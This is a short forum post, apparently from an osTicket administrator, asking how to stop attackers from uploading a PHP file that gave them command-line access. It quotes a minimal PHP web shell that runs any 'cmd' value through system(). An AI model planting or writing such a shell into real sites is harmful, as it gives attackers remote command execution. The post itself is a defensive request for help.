Hey, I was osticket and somebody had uploaded a PHP file that gave them command line access
they used a similar script to this i think
after a quick browse on the net. What I want to know is how can i stop this happening again. I have disabled all uploads through osticket so that should stop it for now.PHP Code:<?PHP
echo "<form action = ''><input type = 'text' name = 'cmd' value = '$cmd' size = '75'><BR>";
if (!$cmd)die;
system($cmd);
?>
Thanks for any help






Bookmarks